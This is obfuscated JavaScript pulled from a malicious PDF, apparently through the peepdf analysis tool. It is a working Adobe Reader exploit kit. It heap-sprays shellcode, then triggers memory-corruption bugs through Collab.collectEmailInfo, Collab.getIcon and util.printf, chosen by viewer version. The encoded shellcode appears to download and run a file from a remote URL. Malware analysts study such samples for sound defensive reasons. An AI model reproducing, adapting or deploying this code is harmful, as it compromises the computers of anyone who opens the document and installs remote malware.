// peepdf comment: Javascript code located in object 7 (version 0)

var fykythiwen = "fykythiwen";
var xyychythoq = new Array();

function nochu(nochu) {
    return nochu;
}
this.vypivynov = 16006;
var vuchu;
var thycapitet = 17857;
var vovyve = 'vovyve';

function quivafor(walejo, xyuxyub) {
    this.huquus = false;
    while (walejo.length * 2 < xyuxyub) walejo += walejo;
    var chechomuq = "chechomuq";
    walejo = walejo.substring(0, xyuxyub / 2);
    var xyaperoqu = "xyaperoqu";
    return walejo;
}
this.xyiquychol = 'xyiquychol';

function xyethejaw(jexyuch) {
    function chuchu() {}
    var ligibir = 0x0c0c0c0c;
    this.xyypyfide = "xyypyfide";
    var damexyahi = "damexyahi";
    var juchezyw = new Array('%u535', '0%u5251', '%u5756', '%u9c55%', 'u00e8%u0', '000%u5d0', '0%ued83%', 'u310d%u6', '4c0%u400', '3%u78', '30%u8b0c%u', '0c40%', 'u708b%ua', 'd1c%u4', '08b%ueb', '08%u8', 'b09%u', '3440%u408d', '%u8b7c', '%u3c4', '0%u5756', '%u5ebe%u', '0001%u010', '0%ubfe', 'e%u01', '4e%u0000%u', 'ef01%ud6e8', '%u000', '1%u5f00%u', '895e%u8', '1ea%u5', 'ec2%u0001', '%u5200%u8', '068%u0000', '%uff00%u4', 'e95%u0001', '%u8900%u', '81ea%u5', 'ec2%u0001%', 'u3100%', 'u01f6%u', '8ac2%u', '359c%u0', '263%u0000%', 'ufb80%', 'u7400%u', '8806%', 'u321c%ueb4', '6%uc6', 'ee%u3204%u', '8900%u81e', 'a%u45c2%', 'u0002%u52', '00%u9', '5ff%u0152%', 'u0000', '%uea89%', 'uc281%u02', '50%u000', '0%u50', '52%u95ff%u', '0156%u', '0000%u006a', '%u006a%u', 'ea89%u', 'c281%u0', '15e%u0', '000%u89', '52%u81', 'ea%u78c2%', 'u0002%u520', '0%u006a', '%ud0ff', '%u056a%ue', 'a89%uc281%', 'u015e%', 'u0000%uff', '52%u5', 'a95%u000', '1%u89', '00%u8', '1ea%u5e', 'c2%u00', '01%u52', '00%u8', '068%u', '0000%uff00', '%u4e95', '%u0001%u8', '900%u', '81ea%u5ec', '2%u0001', '%u3100%u01', 'f6%u8ac2', '%u359c%', 'u026e%u000', '0%ufb80%u', '7400%u88', '06%u321c', '%ueb46%', 'uc6ee%u320', '4%u890', '0%u81ea%u4', '5c2%u0002', '%u5200%u95', 'ff%u0152%', 'u0000%', 'uea89%uc2', '81%u0', '250%u0000%', 'u5052', '%u95ff%u', '0156%', 'u0000', '%u006a%', 'u006a%ue', 'a89%u', 'c281%u0', '15e%u0000', '%u8952%u81', 'ea%ua6c2%', 'u0002%u5', '200%u', '006a%u', 'd0ff%u056', 'a%uea8', '9%uc281%u', '015e%u000', '0%uff', '52%u5', 'a95%u0001', '%u9d00%u5', 'f5d%u5a5', 'e%u5b5', '9%uc358%u', '0000%u00', '00%u000', '0%u0000%u0', '000%u00', '00%u0000%', 'u0000%u', '6547%u5', '474%u6d', '65%u507', '0%u7461%u', '4168%u', '4c00%u61', '6f%u4', 'c64%u', '6269%', 'u6172%u7', '972%u0041%', 'u6547%u50', '74%u6f72', '%u4163', '%u6464%', 'u6572%u', '7373%u', '5700%u6e69', '%u7845%u6', '365%ub', 'b00%uf289%', 'uf789%uc03', '0%u75ae%', 'u29fd%u89f', '7%u31f9%u', 'bec0%u0', '03c%u0000', '%ub503%u0', '21b%u000', '0%uad66', '%u850', '3%u021b%', 'u0000', '%u708b%u', '8378%u1cc', '6%ub503', '%u021b%u0', '000%ubd8', 'd%u02', '1f%u0000%u', '03ad%', 'u1b85%', 'u0002%', 'uab00%u0', '3ad%u1b85%', 'u0002', '%u5000%uad', 'ab%u8503%u', '021b%u000', '0%u5e', 'ab%udb', '31%u56', 'ad%u8', '503%u021b', '%u0000%u', 'c689%u', 'd789%uf', 'c51%ua6f3%', 'u7459%u', '5e04%', 'ueb43%u5e', 'e9%ud19', '3%u03e0%u2', '785%u000', '2%u31', '00%u96f6', '%uad66%', 'ue0c1%u030', '2%u1f85%u', '0002%u89', '00%uadc', '6%u8503%u', '021b%u00', '00%uebc3%', 'u0010', '%u0000', '%u0000%u0', '000%u', '0000%u0000', '%u0000%', 'u0000%u', '8900%', 'u1b85', '%u0002', '%u5600%u', 'e857%uff', '58%uff', 'ff%u5e5', 'f%u01ab%', 'u80ce%u', 'bb3e%u', '0274%u', 'edeb%', 'u55c3', '%u4c52%u4f', '4d%u2e4', 'e%u4c44%', 'u004c%u', '5255%u4', '44c%u7', '76f%u6c6e%', 'u616f%', 'u5464', '%u466f', '%u6c69%', 'u4165', '%u750', '0%u6470%u7', '461%u2e65%', 'u7865%u00', '65%u72', '63%u7361%', 'u2e68%u6', '870%u0070%', 'u7468%', 'u7074', '%u2f3a%u', '762f%u6', '173%u', '736c%u2', 'd6f%u', '6b64%u6a6', '7%u2e31%', 'u6f63%', 'u2f6d%u2f3', '1%u7075%u6', '164%u65', '74%u70', '2e%u706', '8%u900', '0');
    this.dychi = false;
    fecheq = juchezyw.join("");
    this.gynoc = "gynoc";
    var kexyuz = false;
    var bynyquowip = eval("un" + "es" + "ca" + "pe" + "")(fecheq);
    this.xyachequ = false;
    this.quythuro = "quythuro";
    if (jexyuch == 1) {
        this.chithaxy = "chithaxy";
        ligibir = 0x30303030;
        this.gaquawibo = 7118;
        bynyquowip = eval("une" + "sca" + "pe" + "")(fecheq);
        var gexyyxyyt = "gexyyxyyt";
    } else if (jexyuch == 2) {
        var quuziniqu = "quuziniqu";
        bynyquowip = eval("une" + "sca" + "pe" + "")(fecheq);
        this.mexyej = 'mexyej';
    }
    this.quily = 'quily';

    function chychy(chychy) {
        return true;
    }
    var quefesoche = 30658;
    var quesanypox = 0x400000;
    this.duxyu = 'duxyu';
    var jothoc = bynyquowip.length * 2;

    function quexyag() {}
    var xyuxyub = quesanypox - (jothoc + 0x38);

    function thurud(thurud) {
        return thurud;
    }
    var walejo = eval("un" + "es" + "ca" + "pe" + "")("%u909" + "0%u90" + "90" + "");
    var xyeser = "xyeser";
    walejo = quivafor(walejo, xyuxyub);
    this.thichu = 'thichu';
    var rakal = (ligibir - 0x400000) / quesanypox;
    this.thogaby = 'thogaby';
    for (var lizycheh = 0; lizycheh < rakal; lizycheh++) xyychythoq[lizycheh] = walejo + bynyquowip;
    var quixye = 27342;
}
function sacofuquy() {
    function jethoch(jethoch) {
        return jethoch;
    }
    var fegyletho = 0;
    this.thaquul = 'thaquul';
    var kodyx = app.viewerVersion.toString();
    var thechythit = false;
    app.clearTimeOut(vuchu);
    this.kethasec = 22269;
    if ((kodyx >= 8 && kodyx < 8.102) || kodyx < 7.1) {
        var quequuvo = 3053;
        xyethejaw(0);

        function thyxyaquab(thyxyaquab) {
            return thyxyaquab;
        }
        var xyuxy = unescape("%u0" + "c0c" + "%u0" + "c0c" + "");

        function thoti() {}
        while (xyuxy.length < 44952) xyuxy += xyuxy;
        this.quixyexyuz = false;
        eval("this")["col" + "lab" + "Sto" + "re" + ""] = eval("Co" + "ll" + "ab" + "")["col" + "lec" + "tEm" + "ail" + "Inf" + "o" + ""]({
            subj: "choqui",
            msg: xyuxy
        });

        function quithetyby(quithetyby) {
            return quithetyby;
        }
    }
    if ((kodyx >= 8.102 && kodyx < 8.104) || (kodyx >= 9 && kodyx < 9.1) || kodyx <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Col" + "lab" + ""]["get" + "Ico" + "n" + ""]) {
                function thyxyy() {}
                xyethejaw(2);
                this.quath = false;
                var xyuxye = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var tathob = false;

                function kemucha() {}
                while (xyuxye.length < 0x4000) xyuxye += xyuxye;
                this.sequuchoqu = 'sequuchoqu';
                xyuxye = "N." + xyuxye;
                this.petewuqu = 16698;
                eval("ap" + "p" + "")["do" + "c" + ""]["Col" + "lab" + ""]["get" + "Ico" + "n" + ""](xyuxye);

                function kathidu(kathidu) {
                    return kathidu;
                }
                fegyletho = 1;
                var choquu = false;
            } else fegyletho = 1;
        } catch (e) {
            fegyletho = 1;
        }
        if (fegyletho == 1) {
            if (kodyx == 8.102 || kodyx == 7.1) {
                xyethejaw(1);
                var xyifythi = 6386;
                var vuquoduxy = false;
                eval("ut" + "il" + "")["pr" + "in" + "tf" + ""]("%4" + "50" + "00" + "f" + "", "129999999999999999998888" + "888888888888888888888888" + "888888888888888888888888" + "888888888888888888888888" + "888888888888888888888888" + "888888888888888888888888" + "888888888888888888888888" + "888888888888888888888888" + "888888888888888888888888" + "888888888888888888888888" + "888888888888888888888888" + "888888888888888888888888" + "88888888" + "");
            }
        }
    }
}
app.quymepom = sacofuquy;
this.zylupoge = "zylupoge";
vuchu = app.setTimeOut("app.quymepom()", 012);

